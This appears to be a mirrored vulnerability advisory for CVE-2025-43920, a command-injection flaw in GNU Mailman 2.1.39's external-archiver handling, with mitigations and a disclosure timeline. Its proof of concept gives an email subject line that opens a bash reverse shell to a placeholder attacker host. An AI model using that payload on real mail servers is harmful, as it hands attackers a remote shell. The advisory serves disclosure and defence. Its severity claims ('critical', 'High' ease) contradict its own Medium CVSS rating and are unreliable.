来源

关联漏洞

介绍

# CVE-2025-43920: Command Injection via Email Subject in GNU Mailman 2.1.39 (cPanel/WHM Bundle)

**Discovered by:** Firudin Davudzada & Musazada Aydan\
**Disclosure Date:** April 2025\
**CVE ID:** CVE-2025-43920\
**Severity:** 5.4 Medium (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N)\
**Attack Type:** Remote\
**Affected Software:** GNU Mailman 2.1.39 (bundled with cPanel/WHM)

## Overview

GNU Mailman 2.1.39, as bundled with cPanel and WHM, is vulnerable to a critical command injection flaw that allows unauthenticated attackers to execute arbitrary operating system commands. The vulnerability occurs when an external archiver is configured using `PUBLIC_EXTERNAL_ARCHIVER` or `PRIVATE_EXTERNAL_ARCHIVER` in the `mm_cfg.py` configuration file, and the email subject line contains shell metacharacters that are not properly sanitized. This can lead to full system compromise, enabling attackers to establish reverse shells, exfiltrate data, or perform other malicious actions.

## Vulnerability Details

- **Vulnerability Type:** Command Injection
- **Vendor:** GNU Mailman (GNU Mailman)
- **Affected Versions:** Mailman 2.1.39; likely affects older 2.1.x versions (pending regression testing)
- **Affected Components:**
  - External archiver configuration (`PUBLIC_EXTERNAL_ARCHIVER`, `PRIVATE_EXTERNAL_ARCHIVER`)
  - `Mailman/Handlers/` (email subject processing logic, potentially including files like `CookHeaders.py`)
- **Root Cause:** When an external archiver is configured, the email subject line may be passed to a shell command without proper sanitization, allowing execution of arbitrary commands if shell metacharacters (e.g., `;`, `&`, `|`) are present.
- **Status:** No official fix available. Mailman 2.1.x is end-of-life (EOL); migration to Mailman 3.x is strongly recommended.

## Proof of Concept

To exploit this vulnerability, an attacker can send an email to a Mailman-managed list with a malicious subject line, such as:

```bash
Subject: ;bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
```

**Prerequisites:**

- The target Mailman list must have an external archiver configured via `PUBLIC_EXTERNAL_ARCHIVER` or `PRIVATE_EXTERNAL_ARCHIVER`.
- The attacker must control a mail server or client capable of sending to the target list.
- A listener (e.g., `netcat`) must be set up on `ATTACKERIP:4444` to receive the reverse shell.

**Expected Outcome:** If the external archiver command does not sanitize the subject line, the malicious command executes on the server, establishing a reverse shell to the attacker’s server.

## Attack Vectors

- **Primary Vector:** Malicious email subject lines containing shell metacharacters sent to a Mailman-managed mailing list with an external archiver configured.
- **Exploitation Scenarios:**
  - Establish reverse shells for persistent access.
  - Execute commands to exfiltrate data, modify configurations, or install malware.
  - Chain with other vulnerabilities to escalate attacks.
- **Ease of Exploitation:** High, as any email sender can target public or misconfigured lists with an external archiver setup.

## Security Impact

- **Code Execution:** High (arbitrary OS command execution).
- **Privilege Escalation:** High (potential root access depending on Mailman’s runtime privileges).
- **Information Disclosure:** High (command output can reveal system data).
- **Denial of Service:** High (malicious commands can crash or overload the server).

## Mitigations

### Immediate Actions

- **Disable External Archivers:** Set `PUBLIC_EXTERNAL_ARCHIVER` and `PRIVATE_EXTERNAL_ARCHIVER` to `None` in `mm_cfg.py` to disable external archiver functionality:

  ```python
  PUBLIC_EXTERNAL_ARCHIVER = None
  PRIVATE_EXTERNAL_ARCHIVER = None
  ```

- **Sanitize Inputs:** If an external archiver is required, ensure the command sanitizes the subject line to prevent shell metacharacter injection.

- **Restrict Subscriptions:** Limit mailing list subscriptions to trusted users to reduce exposure.

### Long-Term Solutions

- **Upgrade to Mailman 3.x:** Migrate to Mailman 3.x, which implements robust input sanitization and is actively maintained.
- **Disable Email Processing:** If not required, disable Mailman’s email processing functionality to eliminate the attack vector.
- **Harden Environment:** Run Mailman in a containerized environment with minimal privileges to limit the impact of potential exploits.

## Timeline

- **Q1 2025:** Discovered during authorized penetration testing assessment.
- **Q1 2025:** Reported to GNU Mailman and cPanel maintainers.
- **April 2025:** CVE assigned by MITRE.
- **April 2025:** Public disclosure via this repository.

## References

- [Mailman 2.1 Source Code](https://code.launchpad.net/~mailman-coders/mailman/2.1)
- [CVE-2025-43920 Record](https://www.cve.org/CVERecord?id=CVE-2025-43920)
- [Mailman Security Recommendations](https://wiki.list.org/DOC/Mailman%202.1%20List%20Administrators%20Manual)
- [INCIBE-CERT - CVE-2025-43920](https://www.incibe.es/index.php/en/incibe-cert/early-warning/vulnerabilities/cve-2025-43920)
- [VULDB - CVE-2025-43920](https://vuldb.com/it/?id.305745)
- [National Institute of Standards and Technology (NIST) - CVE-2025-43920](https://nvd.nist.gov/vuln/detail/CVE-2025-43920)
- [Tenable - CVE-2025-43920](https://www.tenable.com/cve/CVE-2025-43920)

## Acknowledgments

Firudin Davudzada and Musazada Aydan responsibly disclosed this vulnerability during a sanctioned penetration testing engagement. Thanks to the MITRE CVE team for coordination.

## Contact
**Email:** security@datricon.com\

文件快照

 [4.0K]  /data/pocs/f35e189663ce8ed415d2b2d02d95e95b14f8011b
└── [5.4K]  README.md

0 directories, 1 file

备注